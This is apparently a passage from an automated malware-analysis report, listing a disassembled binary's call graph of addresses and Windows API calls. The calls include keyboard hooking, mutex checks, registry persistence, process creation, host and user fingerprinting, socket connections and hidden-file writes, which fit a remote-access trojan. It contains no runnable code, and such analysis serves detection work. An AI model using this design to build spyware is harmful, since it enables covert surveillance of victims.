47443 43465c 47442->47443 47743 438fda 8 API calls 3 library calls 47442->47743 47443->47410 47744 436f10 47445->47744 47448 4349f9 47449 444223 47448->47449 47746 44f0d9 47449->47746 47451 44422c 47452 434a02 47451->47452 47750 446895 36 API calls 47451->47750 47454 40ea00 47452->47454 47752 41cbe1 LoadLibraryA GetProcAddress 47454->47752 47456 40ea1c GetModuleFileNameW 47757 40f3fe 47456->47757 47458 40ea38 47459 4020f6 28 API calls 47458->47459 47460 40ea47 47459->47460 47461 4020f6 28 API calls 47460->47461 47462 40ea56 47461->47462 47772 41beac 47462->47772 47466 40ea68 47467 401e8d 11 API calls 47466->47467 47468 40ea71 47467->47468 47469 40ea84 47468->47469 47470 40eace 47468->47470 48063 40fbee 118 API calls 47469->48063 47798 401e65 47470->47798 47473 40eade 47477 401e65 22 API calls 47473->47477 47474 40ea96 47475 401e65 22 API calls 47474->47475 47476 40eaa2 47475->47476 48064 410f72 36 API calls __EH_prolog 47476->48064 47478 40eafd 47477->47478 47803 40531e 47478->47803 47481 40eab4 48065 40fb9f 78 API calls 47481->48065 47482 40eb0c 47808 406383 47482->47808 47486 40eabd 48066 40f3eb 71 API calls 47486->48066 47490 401fd8 11 API calls 47491 40eb2d 47490->47491 47493 401fd8 11 API calls 47491->47493 47492 401fd8 11 API calls 47494 40ef36 47492->47494 47495 40eb36 47493->47495 47736 443396 GetModuleHandleW 47494->47736 47496 401e65 22 API calls 47495->47496 47497 40eb3f 47496->47497 47822 401fc0 47497->47822 47499 40eb4a 47500 401e65 22 API calls 47499->47500 47501 40eb63 47500->47501 47502 401e65 22 API calls 47501->47502 47503 40eb7e 47502->47503 47504 40ebe9 47503->47504 48067 406c59 47503->48067 47505 401e65 22 API calls 47504->47505 47510 40ebf6 47505->47510 47507 40ebab 47508 401fe2 28 API calls 47507->47508 47509 40ebb7 47508->47509 47512 401fd8 11 API calls 47509->47512 47511 40ec3d 47510->47511 47517 413584 3 API calls 47510->47517 47826 40d0a4 47511->47826 47514 40ebc0 47512->47514 48072 413584 RegOpenKeyExA 47514->48072 47515 40ec43 47516 40eac6 47515->47516 47829 41b354 47515->47829 47516->47492 47523 40ec21 47517->47523 47521 40f38a 48155 4139e4 30 API calls 47521->48155 47522 40ec5e 47524 40ecb1 47522->47524 47846 407751 47522->47846 47523->47511 48075 4139e4 30 API calls 47523->48075 47527 401e65 22 API calls 47524->47527 47530 40ecba 47527->47530 47529 40f3a0 48156 4124b0 65 API calls ___scrt_get_show_window_mode 47529->48156 47538 40ecc6 47530->47538 47539 40eccb 47530->47539 47532 40ec87 47536 401e65 22 API calls 47532->47536 47533 40ec7d 48076 407773 30 API calls 47533->48076 47548 40ec90 47536->47548 47537 40f3aa 47541 41bcef 28 API calls 47537->47541 48079 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47538->48079 47544 401e65 22 API calls 47539->47544 47540 40ec82 48077 40729b 98 API calls 47540->48077 47545 40f3ba 47541->47545 47546 40ecd4 47544->47546 47955 413a5e RegOpenKeyExW 47545->47955 47850 41bcef 47546->47850 47548->47524 47552 40ecac 47548->47552 47549 40ecdf 47854 401f13 47549->47854 48078 40729b 98 API calls 47552->48078 47556 401f09 11 API calls 47558 40f3d7 47556->47558 47560 401f09 11 API calls 47558->47560 47561 40f3e0 47560->47561 47958 40dd7d 47561->47958 47562 401e65 22 API calls 47564 40ecfc 47562->47564 47567 401e65 22 API calls 47564->47567 47569 40ed16 47567->47569 47568 40f3ea 47570 401e65 22 API calls 47569->47570 47571 40ed30 47570->47571 47572 401e65 22 API calls 47571->47572 47573 40ed49 47572->47573 47574 40edb6 47573->47574 47576 401e65 22 API calls 47573->47576 47575 40edc5 47574->47575 47582 40ef41 ___scrt_get_show_window_mode 47574->47582 47577 40edce 47575->47577 47605 40ee4a ___scrt_get_show_window_mode 47575->47605 47580 40ed5e _wcslen 47576->47580 47578 401e65 22 API calls 47577->47578 47579 40edd7 47578->47579 47581 401e65 22 API calls 47579->47581 47580->47574 47583 401e65 22 API calls 47580->47583 47584 40ede9 47581->47584 48140 413733 RegOpenKeyExA 47582->48140 47585 40ed79 47583->47585 47587 401e65 22 API calls 47584->47587 47588 401e65 22 API calls 47585->47588 47589 40edfb 47587->47589 47590 40ed8e 47588->47590 47592 401e65 22 API calls 47589->47592 48080 40da6f 47590->48080 47591 40ef8c 47593 401e65 22 API calls 47591->47593 47594 40ee24 47592->47594 47595 40efb1 47593->47595 47600 401e65 22 API calls 47594->47600 47876 402093 47595->47876 47598 401f13 28 API calls 47599 40edad 47598->47599 47602 401f09 11 API calls 47599->47602 47603 40ee35 47600->47603 47602->47574 48138 40ce34 46 API calls _wcslen 47603->48138 47604 40efc3 47882 4137aa RegCreateKeyA 47604->47882 47866 413982 47605->47866 47609 40eede ctype 47614 401e65 22 API calls 47609->47614 47610 40ee45 47610->47605 47612 401e65 22 API calls 47613 40efe5 47612->47613 47888 43bb2c 47613->47888 47615 40eef5 47614->47615 47615->47591 47619 40ef09 47615->47619 47618 40effc 48143 41ce2c 88 API calls ___scrt_get_show_window_mode 47618->48143 47621 401e65 22 API calls 47619->47621 47620 40f01f 47625 402093 28 API calls 47620->47625 47623 40ef12 47621->47623 47626 41bcef 28 API calls 47623->47626 47624 40f003 CreateThread 47624->47620 48977 41d4ee 10 API calls 47624->48977 47628 40f034 47625->47628 47627 40ef1e 47626->47627 48139 40f4af 107 API calls 47627->48139 47629 402093 28 API calls 47628->47629 47631 40f043 47629->47631 47892 41b580 47631->47892 47632 40ef23 47632->47591 47634 40ef2a 47632->47634 47634->47516 47636 401e65 22 API calls 47637 40f054 47636->47637 47638 401e65 22 API calls 47637->47638 47639 40f066 47638->47639 47640 401e65 22 API calls 47639->47640 47641 40f086 47640->47641 47642 43bb2c _strftime 40 API calls 47641->47642 47643 40f093 47642->47643 47644 401e65 22 API calls 47643->47644 47645 40f09e 47644->47645 47646 401e65 22 API calls 47645->47646 47647 40f0af 47646->47647 47648 401e65 22 API calls 47647->47648 47649 40f0c4 47648->47649 47650 401e65 22 API calls 47649->47650 47651 40f0d5 47650->47651 47652 40f0dc StrToIntA 47651->47652 47916 409e1f 47652->47916 47655 401e65 22 API calls 47656 40f0f7 47655->47656 47657 40f103 47656->47657 47658 40f13c 47656->47658 48144 43455e 47657->48144 47660 401e65 22 API calls 47658->47660 47662 40f14c 47660->47662 47665 40f194 47662->47665 47666 40f158 47662->47666 47663 401e65 22 API calls 47664 40f11f 47663->47664 47667 40f126 CreateThread 47664->47667 47669 401e65 22 API calls 47665->47669 47668 43455e new 22 API calls 47666->47668 47667->47658 48975 41a045 110 API calls 2 library calls 47667->48975 47670 40f161 47668->47670 47672 40f19d 47669->47672 47671 401e65 22 API calls 47670->47671 47673 40f173 47671->47673 47674 40f207 47672->47674 47675 40f1a9 47672->47675 47678 40f17a CreateThread 47673->47678 47676 401e65 22 API calls 47674->47676 47677 401e65 22 API calls 47675->47677 47679 40f210 47676->47679 47680 40f1b9 47677->47680 47678->47665 48980 41a045 110 API calls 2 library calls 47678->48980 47681 40f255 47679->47681 47682 40f21c 47679->47682 47683 401e65 22 API calls 47680->47683 47941 41b69e GetComputerNameExW GetUserNameW 47681->47941 47685 401e65 22 API calls 47682->47685 47686 40f1ce 47683->47686 47688 40f225 47685->47688 48151 40da23 32 API calls 47686->48151 47693 401e65 22 API calls 47688->47693 47689 401f13 28 API calls 47690 40f269 47689->47690 47692 401f09 11 API calls 47690->47692 47695 40f272 47692->47695 47696 40f23a 47693->47696 47694 40f1e1 47697 401f13 28 API calls 47694->47697 47698 40f27b SetProcessDEPPolicy 47695->47698 47699 40f27e CreateThread 47695->47699 47706 43bb2c _strftime 40 API calls 47696->47706 47700 40f1ed 47697->47700 47698->47699 47701 40f293 CreateThread 47699->47701 47702 40f29f 47699->47702 48948 40f7e2 47699->48948 47703 401f09 11 API calls 47700->47703 47701->47702 48976 412132 139 API calls 47701->48976 47704 40f2b4 47702->47704 47705 40f2a8 CreateThread 47702->47705 47707 40f1f6 CreateThread 47703->47707 47710 40f307 47704->47710 47711 402093 28 API calls 47704->47711 47705->47704 48978 412716 38 API calls ___scrt_get_show_window_mode 47705->48978 47708 40f247 47706->47708 47707->47674 48979 401be9 50 API calls _strftime 47707->48979 48152 40c19d 7 API calls 47708->48152 47952 41353a RegOpenKeyExA 47710->47952 47712 40f2d7 47711->47712 48153 4052fd 28 API calls 47712->48153 47717 40f328 47719 41bcef 28 API calls 47717->47719 47721 40f338 47719->47721 48154 413656 31 API calls 47721->48154 47726 40f34e 47727 401f09 11 API calls 47726->47727 47730 40f359 47727->47730 47728 40f381 DeleteFileW 47729 40f388 47728->47729 47728->47730 47729->47537 47730->47537 47730->47728 47731 40f36f Sleep 47730->47731 47731->47730 47732->47410 47733->47414 47734->47420 47735->47417 47736->47427 47737->47428 47738->47430 47739->47433 47740->47437 47741->47439 47742->47442 47743->47440 47745 434bb8 GetStartupInfoW 47744->47745 47745->47448 47747 44f0eb 47746->47747 47748 44f0e2 47746->47748 47747->47451 47751 44efd8 49 API calls 5 library calls 47748->47751 47750->47451 47751->47747 47753 41cc20 LoadLibraryA GetProcAddress 47752->47753 47754 41cc10 GetModuleHandleA GetProcAddress 47752->47754 47755 41cc49 44 API calls 47753->47755 47756 41cc39 LoadLibraryA GetProcAddress 47753->47756 47754->47753 47755->47456 47756->47755 48157 41b539 FindResourceA 47757->48157 47760 43bda0 _Yarn 21 API calls 47761 40f428 _Yarn 47760->47761 47762 4020b7 28 API calls 47761->47762 47763 40f443 47762->47763 47764 401fe2 28 API calls 47763->47764 47765 40f44e 47764->47765 47766 401fd8 11 API calls 47765->47766 47767 40f457 47766->47767 47768 43bda0 _Yarn 21 API calls 47767->47768 47769 40f468 _Yarn 47768->47769 48160 406e13 47769->48160 47771 40f49b 47771->47458 47773 4020df 11 API calls 47772->47773 47793 41bebf 47773->47793 47774 41bf2f 47775 401fd8 11 API calls 47774->47775 47776 41bf61 47775->47776 47777 401fd8 11 API calls 47776->47777 47779 41bf69 47777->47779 47778 41bf31 47780 4041a2 28 API calls 47778->47780 47782 401fd8 11 API calls 47779->47782 47783 41bf3d 47780->47783 47784 40ea5f 47782->47784 47785 401fe2 28 API calls 47783->47785 47794 40fb52 47784->47794 47787 41bf46 47785->47787 47786 401fe2 28 API calls 47786->47793 47788 401fd8 11 API calls 47787->47788 47790 41bf4e 47788->47790 47789 401fd8 11 API calls 47789->47793 48167 41cec5 28 API calls 47790->48167 47793->47774 47793->47778 47793->47786 47793->47789 48163 4041a2 47793->48163 48166 41cec5 28 API calls 47793->48166 47795 40fb5e 47794->47795 47797 40fb65 47794->47797 48174 402163 11 API calls 47795->48174 47797->47466 47799 401e6d 47798->47799 47800 401e75 47799->47800 48175 402158 22 API calls 47799->48175 47800->47473 47804 4020df 11 API calls 47803->47804 47805 40532a 47804->47805 48176 4032a0 47805->48176 47807 405346 47807->47482 48180 4051ef 47808->48180 47810 406391 48184 402055 47810->48184 47813 401fe2 47814 401ff1 47813->47814 47821 402039 47813->47821 47815 4023ce 11 API calls 47814->47815 47816 401ffa 47815->47816 47817 40203c 47816->47817 47819 402015 47816->47819 47818 40267a 11 API calls 47817->47818 47818->47821 48216 403098 28 API calls 47819->48216 47821->47490 47823 401fd2 47822->47823 47824 401fc9 47822->47824 47823->47499 48217 4025e0 28 API calls 47824->48217 48218 401fab 47826->48218 47828 40d0ae CreateMutexA GetLastError 47828->47515 48219 41c048 47829->48219 47834 401fe2 28 API calls 47835 41b390 47834->47835 47836 401fd8 11 API calls 47835->47836 47837 41b398 47836->47837 47838 4135e1 31 API calls 47837->47838 47840 41b3ee 47837->47840 47839 41b3c1 47838->47839 47841 41b3cc StrToIntA 47839->47841 47840->47522 47842 41b3e3 47841->47842 47843 41b3da 47841->47843 47845 401fd8 11 API calls 47842->47845 48228 41cffa 22 API calls 47843->48228 47845->47840 47847 407765 47846->47847 47848 413584 3 API calls 47847->47848 47849 40776c 47848->47849 47849->47532 47849->47533 47851 41bd03 47850->47851 48229 40b93f 47851->48229 47853 41bd0b 47853->47549 47855 401f22 47854->47855 47862 401f6a 47854->47862 47856 402252 11 API calls 47855->47856 47857 401f2b 47856->47857 47858 401f6d 47857->47858 47860 401f46 47857->47860 48262 402336 47858->48262 48261 40305c 28 API calls 47860->48261 47863 401f09 47862->47863 47864 402252 11 API calls 47863->47864 47865 401f12 47864->47865 47865->47562 47867 4139a0 47866->47867 47868 406e13 28 API calls 47867->47868 47869 4139b5 47868->47869 47870 4020f6 28 API calls 47869->47870 47871 4139c5 47870->47871 47872 4137aa 14 API calls 47871->47872 47873 4139cf 47872->47873 47874 401fd8 11 API calls 47873->47874 47875 4139dc 47874->47875 47875->47609 47877 40209b 47876->47877 47878 4023ce 11 API calls 47877->47878 47879 4020a6 47878->47879 48266 4024ed 47879->48266 47883 4137c3 47882->47883 47884 4137fa 47882->47884 47887 4137d5 RegSetValueExA RegCloseKey 47883->47887 47885 401fd8 11 API calls 47884->47885 47886 40efd9 47885->47886 47886->47612 47887->47884 47889 43bb45 _strftime 47888->47889 48270 43ae83 47889->48270 47891 40eff2 47891->47618 47891->47620 47893 41b631 47892->47893 47894 41b596 GetLocalTime 47892->47894 47895 401fd8 11 API calls 47893->47895 47896 40531e 28 API calls 47894->47896 47897 41b639 47895->47897 47898 41b5d8 47896->47898 47899 401fd8 11 API calls 47897->47899 47900 406383 28 API calls 47898->47900 47902 40f048 47899->47902 47901 41b5e4 47900->47901 48298 402f10 47901->48298 47902->47636 47905 406383 28 API calls 47906 41b5fc 47905->47906 48303 40723b 77 API calls 47906->48303 47908 41b60a 47909 401fd8 11 API calls 47908->47909 47910 41b616 47909->47910 47911 401fd8 11 API calls 47910->47911 47912 41b61f 47911->47912 47913 401fd8 11 API calls 47912->47913 47914 41b628 47913->47914 47915 401fd8 11 API calls 47914->47915 47915->47893 47917 409e3d _wcslen 47916->47917 47918 409e48 47917->47918 47919 409e5f 47917->47919 47920 40da6f 32 API calls 47918->47920 47921 40da6f 32 API calls 47919->47921 47922 409e50 47920->47922 47923 409e67 47921->47923 47924 401f13 28 API calls 47922->47924 47925 401f13 28 API calls 47923->47925 47927 409e5a 47924->47927 47926 409e75 47925->47926 47928 401f09 11 API calls 47926->47928 47930 401f09 11 API calls 47927->47930 47929 409e7d 47928->47929 48322 409196 28 API calls 47929->48322 47932 409eb4 47930->47932 48307 40a144 47932->48307 47933 409e8f 48323 403014 47933->48323 47938 401f13 28 API calls 47939 409ea4 47938->47939 47940 401f09 11 API calls 47939->47940 47940->47927 48527 40417e 47941->48527 47946 403014 28 API calls 47947 41b703 47946->47947 47948 401f09 11 API calls 47947->47948 47949 41b70c 47948->47949 47950 401f09 11 API calls 47949->47950 47951 40f25e 47950->47951 47951->47689 47953 41355b RegQueryValueExA RegCloseKey 47952->47953 47954 40f31f 47952->47954 47953->47954 47954->47561 47954->47717 47956 40f3cd 47955->47956 47957 413a7a RegDeleteValueW 47955->47957 47956->47556 47957->47956 47959 40dd96 47958->47959 47960 41353a 3 API calls 47959->47960 47961 40dd9d 47960->47961 47962 40ddbc 47961->47962 48621 401707 47961->48621 47966 414f65 47962->47966 47964 40ddaa 48624 4138b2 RegCreateKeyA 47964->48624 47967 4020df 11 API calls 47966->47967 47968 414f79 47967->47968 48638 41b944 47968->48638 47971 4020df 11 API calls 47972 414f8f 47971->47972 47973 401e65 22 API calls 47972->47973 47974 414f9d 47973->47974 47975 43bb2c _strftime 40 API calls 47974->47975 47976 414faa 47975->47976 47977 414fbc 47976->47977 47978 414faf Sleep 47976->47978 47979 402093 28 API calls 47977->47979 47978->47977 47980 414fcb 47979->47980 47981 401e65 22 API calls 47980->47981 47982 414fd4 47981->47982 47983 4020f6 28 API calls 47982->47983 47984 414fdf 47983->47984 47985 41beac 28 API calls 47984->47985 47986 414fe7 47985->47986 48642 40489e WSAStartup 47986->48642 47988 414ff1 47989 401e65 22 API calls 47988->47989 47990 414ffa 47989->47990 47991 401e65 22 API calls 47990->47991 48041 415079 47990->48041 47992 415013 47991->47992 47994 401e65 22 API calls 47992->47994 47993 4020f6 28 API calls 47993->48041 47995 415024 47994->47995 47997 401e65 22 API calls 47995->47997 47996 41beac 28 API calls 47996->48041 47998 415035 47997->47998 47999 401e65 22 API calls 47998->47999 48001 415046 47999->48001 48000 406c59 28 API calls 48000->48041 48004 401e65 22 API calls 48001->48004 48002 402f10 28 API calls 48002->48041 48003 401fe2 28 API calls 48003->48041 48005 415057 48004->48005 48007 401e65 22 API calls 48005->48007 48006 401fd8 11 API calls 48006->48041 48008 415069 48007->48008 48778 40473d 89 API calls 48008->48778 48010 40531e 28 API calls 48010->48041 48011 406383 28 API calls 48011->48041 48013 4151c7 WSAGetLastError 48779 41cb72 30 API calls 48013->48779 48018 402093 28 API calls 48019 4151d7 48018->48019 48019->48018 48021 41b580 80 API calls 48019->48021 48024 401e65 22 API calls 48019->48024 48025 401e8d 11 API calls 48019->48025 48026 43bb2c _strftime 40 API calls 48019->48026 48019->48041 48060 415aac CreateThread 48019->48060 48061 401fd8 11 API calls 48019->48061 48062 401f09 11 API calls 48019->48062 48780 4052fd 28 API calls 48019->48780 48782 40b08c 85 API calls 48019->48782 48783 404e26 99 API calls 48019->48783 48021->48019 48022 401e65 22 API calls 48022->48041 48024->48019 48025->48019 48027 415b0a Sleep 48026->48027 48027->48019 48028 402093 28 API calls 48028->48041 48029 41b580 80 API calls 48029->48041 48032 409097 28 API calls 48032->48041 48033 441ed1 20 API calls 48033->48041 48034 413733 3 API calls 48034->48041 48035 4135e1 31 API calls 48035->48041 48036 40417e 28 API calls 48036->48041 48040 41bc1f 28 API calls 48040->48041 48041->47993 48041->47996 48041->48000 48041->48002 48041->48003 48041->48006 48041->48010 48041->48011 48041->48013 48041->48019 48041->48022 48041->48028 48041->48029 48041->48032 48041->48033 48041->48034 48041->48035 48041->48036 48041->48040 48042 401e65 22 API calls 48041->48042 48643 414f24 48041->48643 48648 40482d 48041->48648 48655 404f51 48041->48655 48670 4048c8 connect 48041->48670 48730 41b871 48041->48730 48733 4145f8 48041->48733 48736 40ddc4 48041->48736 48742 41bcd3 48041->48742 48745 41bdaf 48041->48745 48043 415474 GetTickCount 48042->48043 48044 41bc1f 28 API calls 48043->48044 48050 415491 48044->48050 48046 41bc1f 28 API calls 48046->48050 48048 41bdaf 28 API calls 48048->48050 48050->48046 48050->48048 48052 402ea1 28 API calls 48050->48052 48053 402f10 28 API calls 48050->48053 48054 406383 28 API calls 48050->48054 48056 401fd8 11 API calls 48050->48056 48057 401f09 11 API calls 48050->48057 48749 41bb77 GetLastInputInfo GetTickCount 48050->48749 48750 41bb27 48050->48750 48755 40f90c GetLocaleInfoA 48050->48755 48758 402f31 28 API calls 48050->48758 48759 404c10 48050->48759 48781 404aa1 61 API calls _Yarn 48050->48781 48052->48050 48053->48050 48054->48050 48056->48050 48057->48050 48060->48019 48938 41ada8 106 API calls 48060->48938 48061->48019 48062->48019 48063->47474 48064->47481 48065->47486 48068 4020df 11 API calls 48067->48068 48069 406c65 48068->48069 48070 4032a0 28 API calls 48069->48070 48071 406c82 48070->48071 48071->47507 48073 40ebdf 48072->48073 48074 4135ae RegQueryValueExA RegCloseKey 48072->48074 48073->47504 48073->47521 48074->48073 48075->47511 48076->47540 48077->47532 48078->47524 48079->47539 48081 401f86 11 API calls 48080->48081 48082 40da8b 48081->48082 48083 40dae0 48082->48083 48084 40daab 48082->48084 48086 40daa1 48082->48086 48087 41c048 2 API calls 48083->48087 48939 41b645 29 API calls 48084->48939 48085 40dbd4 GetLongPathNameW 48089 40417e 28 API calls 48085->48089 48086->48085 48090 40dae5 48087->48090 48092 40dbe9 48089->48092 48093 40dae9 48090->48093 48094 40db3b 48090->48094 48091 40dab4 48095 401f13 28 API calls 48091->48095 48096 40417e 28 API calls 48092->48096 48098 40417e 28 API calls 48093->48098 48097 40417e 28 API calls 48094->48097 48099 40dabe 48095->48099 48100 40dbf8 48096->48100 48101 40db49 48097->48101 48102 40daf7 48098->48102 48103 401f09 11 API calls 48099->48103 48942 40de0c 28 API calls 48100->48942 48107 40417e 28 API calls 48101->48107 48108 40417e 28 API calls 48102->48108 48103->48086 48105 40dc0b 48943 402fa5 28 API calls 48105->48943 48110 40db5f 48107->48110 48111 40db0d 48108->48111 48109 40dc16 48944 402fa5 28 API calls 48109->48944 48941 402fa5 28 API calls 48110->48941 48940 402fa5 28 API calls 48111->48940 48115 40db18 48119 401f13 28 API calls 48115->48119 48116 40dc20 48120 401f09 11 API calls 48116->48120 48117 40db6a 48118 401f13 28 API calls 48117->48118 48121 40db75 48118->48121 48122 40db23 48119->48122 48123 40dc2a 48120->48123 48125 401f09 11 API calls 48121->48125 48126 401f09 11 API calls 48122->48126 48124 401f09 11 API calls 48123->48124 48127 40dc33 48124->48127 48128 40db7e 48125->48128 48129 40db2c 48126->48129 48130 401f09 11 API calls 48127->48130 48131 401f09 11 API calls 48128->48131 48132 401f09 11 API calls 48129->48132 48133 40dc3c 48130->48133 48131->48099 48132->48099 48134 401f09 11 API calls 48133->48134 48135 40dc45 48134->48135 48136 401f09 11 API calls 48135->48136 48137 40dc4e 48136->48137 48137->47598 48138->47610 48139->47632 48141 413759 RegQueryValueExA RegCloseKey 48140->48141 48142 41377d 48140->48142 48141->48142 48142->47591 48143->47624 48150 434563 48144->48150 48145 43bda0 _Yarn 21 API calls 48145->48150 48146 40f10c 48146->47663 48150->48145 48150->48146 48945 443001 7 API calls 2 library calls 48150->48945 48946 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48150->48946 48947 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48150->48947 48151->47694 48152->47681 48154->47726 48155->47529 48158 41b556 LoadResource LockResource SizeofResource 48157->48158 48159 40f419 48157->48159 48158->48159 48159->47760 48161 4020b7 28 API calls 48160->48161 48162 406e27 48161->48162 48162->47771 48168 40423a 48163->48168 48166->47793 48167->47774 48169 404243 48168->48169 48170 4023ce 11 API calls 48169->48170 48171 40424e 48170->48171 48172 402569 28 API calls 48171->48172 48173 4041b5 48172->48173 48173->47793 48174->47797 48177 4032aa 48176->48177 48178 4028e8 28 API calls 48177->48178 48179 4032c9 48177->48179 48178->48179 48179->47807 48181 4051fb 48180->48181 48190 405274 48181->48190 48183 405208 48183->47810 48185 402061 48184->48185 48186 4023ce 11 API calls 48185->48186 48187 40207b 48186->48187 48212 40267a 48187->48212 48191 405282 48190->48191 48192 405288 48191->48192 48193 40529e 48191->48193 48201 4025f0 48192->48201 48195 4052f5 48193->48195 48196 4052b6 48193->48196 48210 4028a4 22 API calls 48195->48210 48199 4028e8 28 API calls 48196->48199 48200 40529c 48196->48200 48199->48200 48200->48183 48202 402888 22 API calls 48201->48202 48203 402602 48202->48203 48204 402672 48203->48204 48205 402629 48203->48205 48211 4028a4 22 API calls 48204->48211 48208 4028e8 28 API calls 48205->48208 48209 40263b 48205->48209 48208->48209 48209->48200 48213 40268b 48212->48213 48214 4023ce 11 API calls 48213->48214 48215 40208d 48214->48215 48215->47813 48216->47821 48217->47823 48220 41b362 48219->48220 48221 41c055 GetCurrentProcess IsWow64Process 48219->48221 48223 4135e1 RegOpenKeyExA 48220->48223 48221->48220 48222 41c06c 48221->48222 48222->48220 48224 41360f RegQueryValueExA RegCloseKey 48223->48224 48225 413639 48223->48225 48224->48225 48226 402093 28 API calls 48225->48226 48227 41364e 48226->48227 48227->47834 48228->47842 48230 40b947 48229->48230 48235 402252 48230->48235 48232 40b952 48239 40b967 48232->48239 48234 40b961 48234->47853 48236 4022ac 48235->48236 48237 40225c 48235->48237 48236->48232 48237->48236 48246 402779 11 API calls std::_Deallocate 48237->48246 48240 40b9a1 48239->48240 48241 40b973 48239->48241 48258 4028a4 22 API calls 48240->48258 48247 4027e6 48241->48247 48245 40b97d 48245->48234 48246->48236 48248 4027ef 48247->48248 48249 402851 48248->48249 48250 4027f9 48248->48250 48260 4028a4 22 API calls 48249->48260 48253 402802 48250->48253 48255 402815 48250->48255 48259 402aea 28 API calls __EH_prolog 48253->48259 48256 402813 48255->48256 48257 402252 11 API calls 48255->48257 48256->48245 48257->48256 48259->48256 48261->47862 48263 402347 48262->48263 48264 402252 11 API calls 48263->48264 48265 4023c7 48264->48265 48265->47862 48267 4024f9 48266->48267 48268 40250a 28 API calls 48267->48268 48269 4020b1 48268->48269 48269->47604 48286 43ba8a 48270->48286 48272 43aed0 48292 43a837 36 API calls 3 library calls 48272->48292 48274 43ae95 48274->48272 48275 43aeaa 48274->48275 48277 43aeaf _abort 48274->48277 48291 44062d 20 API calls _abort 48275->48291 48277->47891 48279 43aedc 48281 43af0b 48279->48281 48293 43bacf 40 API calls __Tolower 48279->48293 48283 43af77 48281->48283 48294 43ba36 20 API calls 2 library calls 48281->48294 48295 43ba36 20 API calls 2 library calls 48283->48295 48284 43b03e _strftime 48284->48277 48296 44062d 20 API calls _abort 48284->48296 48287 43baa2 48286->48287 48288 43ba8f 48286->48288 48287->48274 48297 44062d 20 API calls _abort 48288->48297 48290 43ba94 _abort 48290->48274 48291->48277 48292->48279 48293->48279 48294->48283 48295->48284 48296->48277 48297->48290 48304 401fb0 48298->48304 48300 402f1e 48301 402055 11 API calls 48300->48301 48302 402f2d 48301->48302 48302->47905 48303->47908 48305 4025f0 28 API calls 48304->48305 48306 401fbd 48305->48306 48306->48300 48308 40a162 48307->48308 48309 413584 3 API calls 48308->48309 48310 40a169 48309->48310 48311 40a197 48310->48311 48312 40a17d 48310->48312 48328 409097 48311->48328 48314 40a182 48312->48314 48315 409ed6 48312->48315 48317 409097 28 API calls 48314->48317 48315->47655 48319 40a190 48317->48319 48356 40a268 29 API calls 48319->48356 48321 40a195 48321->48315 48322->47933 48504 403222 48323->48504 48325 403022 48508 403262 48325->48508 48329 4090ad 48328->48329 48330 402252 11 API calls 48329->48330 48331 4090c7 48330->48331 48357 404267 48331->48357 48333 4090d5 48334 40a1b4 48333->48334 48369 40b927 48334->48369 48337 40a205 48340 402093 28 API calls 48337->48340 48338 40a1dd 48339 402093 28 API calls 48338->48339 48341 40a1e7 48339->48341 48342 40a210 48340->48342 48343 41bcef 28 API calls 48341->48343 48344 402093 28 API calls 48342->48344 48345 40a1f5 48343->48345 48346 40a21f 48344->48346 48373 40b19f 31 API calls _Yarn 48345->48373 48348 41b580 80 API calls 48346->48348 48350 40a224 CreateThread 48348->48350 48349 40a1fc 48351 401fd8 11 API calls 48349->48351 48352 40a24b CreateThread 48350->48352 48353 40a23f CreateThread 48350->48353 48375 40a2b8 48350->48375 48351->48337 48354 401f09 11 API calls 48352->48354 48381 40a2c4 48352->48381 48353->48352 48378 40a2a2 48353->48378 48355 40a25f 48354->48355 48355->48315 48356->48321 48503 40a2ae 164 API calls 48356->48503 48358 402888 22 API calls 48357->48358 48359 40427b 48358->48359 48360 404290 48359->48360 48361 4042a5 48359->48361 48367 4042df 22 API calls 48360->48367 48363 4027e6 28 API calls 48361->48363 48366 4042a3 48363->48366 48364 404299 48368 402c48 22 API calls 48364->48368 48366->48333 48367->48364 48368->48366 48370 40b930 48369->48370 48371 40a1d2 48369->48371 48374 40b9a7 28 API calls 48370->48374 48371->48337 48371->48338 48373->48349 48374->48371 48384 40a761 48375->48384 48431 40a2f3 48378->48431 48461 40ad11 48381->48461 48385 40a776 Sleep 48384->48385 48405 40a6b0 48385->48405 48387 40a2c1 48388 40a7b6 CreateDirectoryW 48393 40a788 48388->48393 48389 40a7c7 GetFileAttributesW 48389->48393 48390 40a7de SetFileAttributesW 48390->48393 48391 4020df 11 API calls 48403 40a829 48391->48403 48393->48385 48393->48387 48393->48388 48393->48389 48393->48390 48395 401e65 22 API calls 48393->48395 48393->48403 48418 41c482 48393->48418 48394 40a858 PathFileExistsW 48394->48403 48395->48393 48397 4020b7 28 API calls 48397->48403 48398 40a961 SetFileAttributesW 48398->48393 48399 401fe2 28 API calls 48399->48403 48400 406e13 28 API calls 48400->48403 48401 401fd8 11 API calls 48401->48403 48403->48391 48403->48394 48403->48397 48403->48398 48403->48399 48403->48400 48403->48401 48404 401fd8 11 API calls 48403->48404 48428 41c516 32 API calls 48403->48428 48429 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48403->48429 48404->48393 48406 40a75d 48405->48406 48409 40a6c6 48405->48409 48406->48393 48407 40a6e5 CreateFileW 48408 40a6f3 GetFileSize 48407->48408 48407->48409 48408->48409 48410 40a728 CloseHandle 48408->48410 48409->48407 48409->48410 48411 40a73a 48409->48411 48412 40a716 48409->48412 48413 40a71d Sleep 48409->48413 48410->48409 48411->48406 48415 409097 28 API calls 48411->48415 48430 40b117 84 API calls 48412->48430 48413->48410 48416 40a756 48415->48416 48417 40a1b4 125 API calls 48416->48417 48417->48406 48419 41c495 CreateFileW 48418->48419 48421 41c4d2 48419->48421 48422 41c4ce 48419->48422 48423 41c4f2 WriteFile 48421->48423 48424 41c4d9 SetFilePointer 48421->48424 48422->48393 48426 41c505 48423->48426 48427 41c507 CloseHandle 48423->48427 48424->48423 48425 41c4e9 CloseHandle 48424->48425 48425->48422 48426->48427 48427->48422 48428->48403 48429->48403 48430->48413 48432 40a30c GetModuleHandleA SetWindowsHookExA 48431->48432 48433 40a36e GetMessageA 48431->48433 48432->48433 48434 40a328 GetLastError 48432->48434 48435 40a380 TranslateMessage DispatchMessageA 48433->48435 48436 40a2ab 48433->48436 48446 41bc1f 48434->48446 48435->48433 48435->48436 48452 441ed1 48446->48452 48449 402093 28 API calls 48450 40a339 48449->48450 48451 4052fd 28 API calls 48450->48451 48453 441edd 48452->48453 48456 441ccd 48453->48456 48455 41bc43 48455->48449 48457 441ce4 48456->48457 48459 441d1b 